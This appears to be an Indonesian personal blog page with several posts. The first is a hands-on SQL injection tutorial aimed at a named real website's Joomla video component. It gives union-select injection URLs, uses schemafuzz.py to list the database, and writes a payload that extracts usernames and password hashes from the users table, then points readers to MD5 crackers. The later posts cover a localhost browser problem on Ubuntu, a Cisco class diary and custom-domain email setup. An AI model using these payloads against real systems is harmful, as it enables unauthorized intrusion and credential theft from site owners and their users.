About MeSQL Injection mungkin bukan kata yang aneh lagi bagi para orang yang suka hacking khususnya website, Sebelumnya artikel ini ditujukan untuk anda yang tau tentang perintah SQL walaupun dikit. Oke lanjut kli ini kita akan mencoba teknik SQL Injection menggunakkan python code yaitu schemafuzz.py untuk download silahkan Klik Disini. Ingat karena ini merupakan python code jadi kita perlu menginstall python untuk menjalankannya untuk download program python silahkan langsung ke website python.org atau Klik disini, silahkan sesuaikan dengan sistem Operasi yang anda pakai.
Oke langsung aja y, setelah selesai download pythonnya langsung install aja, kemudian jalankan lewat DOS caranya masuk ke
start menu -> Run -> cmd atau command.
selanjutnya pindah ke directory python yang sudah kita install ketik cd\ lalu enter, ketikan cd Python26 -> Enter sesuaikan dengan versi python yang dipakai. kemudian copy schemafuzz.py yang sudah kita download tadi kedalam directory python.
langkah selanjutnya adalah cari target sasaran kali ini kita akan coba dengan target http://www.windsurfing.gr kita cari dulu SQL vulnerable nya, kita dapatkan pada komponent com_xsstream-dm component untuk streaming video, sekarang coba masukan perintah SQLhttp://www.windsurfing.gr/index.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
lihat pesan kesalahannya dibawah ada angka 3
Setelah kita dapat kode kesalahan lanjutkan dengan schemafuzz.py untuk mendapatkan nama database, nama tabel dan nama kolom dalam tabel. caranya masuk ke DOS lagi terus ketikan :
C:\Python26>schemafuzz.py -u "http://www.windsurfing.grindex.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,darkc0de,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22/*"
Rubah angka 3 yang ada diatas dengan darkc0de, hasilnya yang kita dapatkan seperti ini :
untuk mempelajari schemafuzz ini silahkan buka aja helpnya ketikan : schemafuzz.py -help.
dari gambar diatas kita bisa dapatkan Nama Database, User, Versi SQL yang digunakkan, Nama Tabel dan Nama Kolom dalam tabel.
setelah kita dapatkan semua,langkah selanjutnya extract kolom dalam tabel itu.
http://www.windsurfing.gr/index.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22+from+jos_users/*
hasilnya seperti ini :
dapat dech username dan password walaupun masih dalam bentuk MD5, selanjutnya cari sendiri y tool untuk MD5 decrypt cari aja di google. oke sekian dulu mudah-mudahan bermanfaat.
Artikel ini juga bisa dilihat Disini.
Setelah sempat beberapa hari nyari tutorial buat jalanin LAMP server di Ubuntu 8.10 n gak dapat-dapat akhirnya masalah terselesaikan sendiri 
. masalah yang aku hadapi atau mungkin orang lain hadapi juga sama tapi yang dah install Ubuntu 8.10 dan Install LAMP (Linux Apache Mysql PHP) yaitu ketika komputer kita tidak terhubung ke Internet LAMP juga akan mati atau Offline.
Tapi akhirnya setelah nyari dan tanya pada forum Ubuntu Indonesia langsung dan jawaban kurang memberi solusi, diantaranya ada yang memberi jawaban suruh periksa di /etc/hosts dan pastikan127.0.0.1 localhost
dan setelah ku periksa memang dah sama soalnya setau ku klo kita install Apache setting selalu localhost dan IP 127.0.01 atau 127.0.1.1 tapi setelah ku coba lagi buka lewat Firefox dan ketikan localhost tetap aja Offline Mode ku juga dah jalanin
sudo /etc/init.d/apache start
sudo /etc/init.d/mysql start
Perintah buat jalanin Apache dan Mysql tapi hasil tetap j, dan gak sengaja karena ku masih punya master Browser Opera 9 yang buat debian ku coba install dech, lalu aku coba jalanin localhost dan ternyata hasilnya perfect.Its Work!!
Coba localhost/phpmyadmin eh bisa juga, jadi kesimpulannya kalo menurutku browser Firefox di Ubuntu 8.10 da masalah untuk Mode Offline buat localhost buktinya setelah ku coba pake Opera fine2 ja kok.
Jadi mulai sekarang bisa lanjutin lagi dech Proyek buat Web yang dulu sempat tertunda gara2 Upgrade Ubuntu.
Oke ayo semangat lagi!
Hari ini lagi malas nulis yang serius-serius banget jadi buat j tulisan sembarang, oh y hari ini aku lagi gak ada kegiatan, cuma da satu kuliah cisco n gak ada kuliah umum jadi agak santai nich, tapi kuliah cisco j pusing banget abiz kuliahnya lama banget 2 jam setengah.
Pertama masuk LAB Cisco santai dulu ngenet soalnya dosennya gak belum datang jadi bebas ngenet dulu mumpung gratis, hehehe..!! sambil buka-buka blog yang gak pernah ku update soalnya malas banget mau nulisnya.
gak beberapa lama dosen datang kuliah pun di mulai dengan gaya dosen yang logat jawanya kentara banget bikin ku mau ketawa terus, kuliah pertama setelah dulu sempat libur beberapa bulan ini merupakan kuliah lanjutan untuk CCNA 2 setelah dulu dah lulus CCNA 1 dengan nilai pas-pasan hehehe..!!.
lama gak belajar cisco aku dah lupa banyak hal perintah-perintah buat setting router aja dah banyak yang lupa untung j masih ada modul yang bisa membantu dikit. kuliah berjalan selama 2 jam setengah walaupun sudah sangat melelahkan tapi dosennya tetap aja masih kuat. oh y hari ini juga kelas ku dibuat untuk CCNA Exploration 2 di website Cisco jadi ujiannya Online terus dech.
oh y hari ini ku cuma belajar 1 chapter j itupun masih pengenalan yang dari dulu diulang-ulang tentang pengenalan Router dan konfigurasi dasar sampe bosen dech itu-itu terus.ach dah dulu y capek nulis nich dah malam juga lain kali dianjut lagi dech.
oke..
Sekedar Sharing aja buat teman-teman yang ingin punya domain email dengan nama sendiri misal namaanda@namasitus.co.cc seperti emailku ryo@c4turla.co.cc atau bisa cek di mail.c4turla.co.cc dan artikel ini juga merupakan artikel lanjutan dari artikel sebelumnya yang berjudul Costum Domain Gratis co.cc. Oke langsung aja dech lagi malas basa-basi nich dah ngantuk soalnya.
Hal pertama yang anda lakukan adalah daftarkan diri anda di www.co.cc setelah proses registrasi selesai dan email sudah di verifikasi kita lanjutkan dengan langkah selanjutnya yaitu costum Domain yang kita punya.
Lanjut lagi sebelum kita melakukan Costum domain ini untuk mendapatkan Email gratis kita gunakkan Google Apps klik link Google terus Masukan email anda. Lakukan Sign Up sampai selesai.
Langkah selanjutnya lakukan setting Domain co.cc tadi dengan Google Apps, yang perlu dilakukan hanya dengan setting DNS Park, CNAME dan MMX agar Google Apps tadi ter-Rocord olah domain co.cc sampai hasilnya seperti gambar dibawah ini.
Y kira-kira hasilnya begitu, dan maaf kalo tulisannya kurang detai banget soalnya dah ngantuk waktu nulisnya, hehehe..!! kecuali klo ada yang request baru mungkin akan saya detailkan lagi.
Thank's All , Tidur dulu y besok da kuliah soalnya.
